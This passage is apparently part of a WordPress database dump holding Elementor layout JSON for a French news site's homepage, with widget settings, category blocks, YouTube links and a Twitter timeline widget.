\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.998},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42.001},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2414,772,'_elementor_version','0.4'),(2415,772,'_elementor_css','a:3:{s:4:\"time\";i:1509378851;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2417,773,'_elementor_edit_mode','builder'),(2418,773,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\